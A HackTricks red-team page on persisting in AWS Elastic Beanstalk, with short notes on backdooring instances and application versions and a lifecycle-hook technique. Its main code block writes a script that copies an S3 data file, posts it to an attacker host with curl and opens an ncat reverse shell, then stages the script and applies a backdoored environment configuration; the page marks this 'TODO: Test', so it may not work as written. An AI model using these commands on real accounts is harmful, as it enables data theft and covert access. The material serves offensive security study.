AWS - Elastic Beanstalk Persistence

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Elastic Beanstalk

For more information check:

Persistence in Instance

In order to maintain persistence inside the AWS account, some persistence mechanism could be introduced inside the instance (cron job, ssh key...) so the attacker will be able to access it and steal IAM role credentials from the metadata service.

Backdoor in Version

An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.

New backdoored version

Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.

Abusing Custom Resource Lifecycle Hooks

TODO: Test

Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account.

bashCopy code# Attacker creates a script that exfiltrates data and maintains access
echo '#!/bin/bash
aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
gzip /tmp/data.csv
curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh

# Attacker uploads the script to an S3 bucket
aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh

# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
echo 'Resources:
  AWSEBAutoScalingGroup:
    Metadata:
      AWS::ElasticBeanstalk::Ext:
        TriggerConfiguration:
          triggers:
            - name: stealthy-lifecycle-hook
              events:
                - "autoscaling:EC2_INSTANCE_LAUNCH"
                - "autoscaling:EC2_INSTANCE_TERMINATE"
              target:
                ref: "AWS::ElasticBeanstalk::Environment"
              arn:
                Fn::GetAtt:
                  - "AWS::ElasticBeanstalk::Environment"
                  - "Arn"
  stealthyLifecycleHook:
    Type: AWS::AutoScaling::LifecycleHook
    Properties:
      AutoScalingGroupName:
        Ref: AWSEBAutoScalingGroup
      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
      NotificationTargetARN:
        Ref: stealthy-lifecycle-hook
      RoleARN:
        Fn::GetAtt:
          - AWSEBAutoScalingGroup
          - Arn' > stealthy_lifecycle_hook.yaml

# Attacker applies the new environment configuration
aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - ECS Persistence NextAWS - EFS Persistence

Last updated 2 months ago